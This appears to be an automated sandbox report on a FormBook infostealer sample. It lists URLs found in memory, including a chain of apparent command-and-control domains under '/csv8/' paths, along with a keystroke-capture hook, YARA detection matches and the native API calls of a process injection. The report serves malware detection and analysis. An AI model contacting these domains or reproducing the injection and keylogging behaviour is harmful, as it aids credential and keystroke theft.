65 77 5f 74 65 6d 70 6c 61 74 65 73 2f 69 6d 67 2f 79 65 6c 6c 6f 77 2f 77 65 62 70 72 6f 2e 69 63 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 61 6c 65 77 61 79 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63

Urls found in memory or binary data

Source: explorer.exe, 00000005.00000000.257657621.000000000F640000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.aldanasanchezmx.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.aldanasanchezmx.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.aldanasanchezmx.com/csv8/www.bhoomimart.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.aldanasanchezmx.comReferer:
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.alparmuhendislik.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.alparmuhendislik.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.alparmuhendislik.com/csv8/www.latin-hotspot.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.alparmuhendislik.comReferer:
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.ankitparivar.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.ankitparivar.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.ankitparivar.comReferer:
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.bhoomimart.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.bhoomimart.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.bhoomimart.com/csv8/www.yyyut6.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.bhoomimart.comReferer:
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.colliapse.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.colliapse.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.colliapse.com/csv8/www.masterzushop.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.colliapse.comReferer:
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.epicmassiveconcepts.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.epicmassiveconcepts.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.epicmassiveconcepts.com/csv8/www.magenx2.info
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.epicmassiveconcepts.comReferer:
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: JAAkR51fQY.exe, 00000000.00000003.227413251.0000000007E45000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comK
Source: JAAkR51fQY.exe, 00000000.00000003.227413251.0000000007E45000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comasva
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: JAAkR51fQY.exe, 00000000.00000003.205857658.0000000007E52000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: JAAkR51fQY.exe, 00000000.00000003.205857658.0000000007E52000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnh
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.globepublishers.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.globepublishers.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.globepublishers.com/csv8/www.thedigitalsatyam.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.globepublishers.comReferer:
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.herbmedia.net
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.herbmedia.net/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.herbmedia.net/csv8/www.scheherazadelegault.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.herbmedia.netReferer:
Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmp, JAAkR51fQY.exe, 00000000.00000003.206667781.0000000007E43000.00000004.00000001.sdmp, JAAkR51fQY.exe, 00000000.00000003.207211285.0000000007E49000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/.
Source: JAAkR51fQY.exe, 00000000.00000003.206667781.0000000007E43000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp//e
Source: JAAkR51fQY.exe, 00000000.00000003.207211285.0000000007E49000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y
Source: JAAkR51fQY.exe, 00000000.00000003.207211285.0000000007E49000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0e
Source: JAAkR51fQY.exe, 00000000.00000003.207061983.0000000007E47000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0onY
Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/f
Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmp, JAAkR51fQY.exe, 00000000.00000003.207211285.0000000007E49000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/K
Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/s
Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/sDX
Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/t
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.latin-hotspot.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.latin-hotspot.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.latin-hotspot.com/csv8/www.globepublishers.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.latin-hotspot.comReferer:
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.magenx2.info
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.magenx2.info/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.magenx2.info/csv8/www.ankitparivar.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.magenx2.infoReferer:
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.masterzushop.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.masterzushop.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.masterzushop.com/csv8/www.aldanasanchezmx.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.masterzushop.comReferer:
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.scheherazadelegault.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.scheherazadelegault.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.scheherazadelegault.com/csv8/www.starrockindia.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.scheherazadelegault.comReferer:
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.starrockindia.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.starrockindia.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.starrockindia.com/csv8/www.studentdividers.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.starrockindia.comReferer:
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.studentdividers.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.studentdividers.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.studentdividers.com/csv8/www.epicmassiveconcepts.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.studentdividers.comReferer:
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.thedigitalsatyam.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.thedigitalsatyam.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.thedigitalsatyam.com/csv8/www.herbmedia.net
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.thedigitalsatyam.comReferer:
Source: explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.yyyut6.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.yyyut6.com/csv8/
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.yyyut6.com/csv8/www.alparmuhendislik.com
Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmp	String found in binary or memory: http://www.yyyut6.comReferer:
Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp	String found in binary or memory: https://cpanel.hostinger.com
Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/hostinger/banners/master/hostinger_welcome/images/hostinger-dragon
Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/hostinger/banners/master/hostinger_welcome/images/hostinger-logo.p
Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26575989-44
Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp	String found in binary or memory: https://www.hostinger.com/
Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp	String found in binary or memory: https://www.hostinger.com/affiliate-program
Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp	String found in binary or memory: https://www.hostinger.com/blog/
Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp	String found in binary or memory: https://www.hostinger.com/knowledge-base
Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp	String found in binary or memory: https://www.hostinger.com/make-money-online
Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp	String found in binary or memory: https://www.hostinger.com/tutorials

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Source: JAAkR51fQY.exe, 00000000.00000002.228113773.0000000000EDA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_004181C0 NtCreateFile,		4_2_004181C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_00418270 NtReadFile,		4_2_00418270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_004182F0 NtClose,		4_2_004182F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_004183A0 NtAllocateVirtualMemory,		4_2_004183A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_004181BA NtCreateFile,		4_2_004181BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0041826A NtReadFile,		4_2_0041826A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9540 NtReadFile,LdrInitializeThunk,		4_2_056F9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F95D0 NtClose,LdrInitializeThunk,		4_2_056F95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9710 NtQueryInformationToken,LdrInitializeThunk,		4_2_056F9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9FE0 NtCreateMutant,LdrInitializeThunk,		4_2_056F9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F97A0 NtUnmapViewOfSection,LdrInitializeThunk,		4_2_056F97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9780 NtMapViewOfSection,LdrInitializeThunk,		4_2_056F9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9660 NtAllocateVirtualMemory,LdrInitializeThunk,		4_2_056F9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F96E0 NtFreeVirtualMemory,LdrInitializeThunk,		4_2_056F96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,		4_2_056F9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F99A0 NtCreateSection,LdrInitializeThunk,		4_2_056F99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9860 NtQuerySystemInformation,LdrInitializeThunk,		4_2_056F9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9840 NtDelayExecution,LdrInitializeThunk,		4_2_056F9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F98F0 NtReadVirtualMemory,LdrInitializeThunk,		4_2_056F98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9A50 NtCreateFile,LdrInitializeThunk,		4_2_056F9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9A20 NtResumeThread,LdrInitializeThunk,		4_2_056F9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9A00 NtProtectVirtualMemory,LdrInitializeThunk,		4_2_056F9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9560 NtWriteFile,		4_2_056F9560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9520 NtWaitForSingleObject,		4_2_056F9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056FAD30 NtSetContextThread,		4_2_056FAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F95F0 NtQueryInformationFile,		4_2_056F95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9760 NtOpenProcess,		4_2_056F9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9770 NtSetInformationFile,		4_2_056F9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056FA770 NtOpenThread,		4_2_056FA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9730 NtQueryVirtualMemory,		4_2_056F9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056FA710 NtOpenProcessToken,		4_2_056FA710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9670 NtQueryInformationProcess,		4_2_056F9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F9650 NtQueryValueKey,		4_2_056F9650
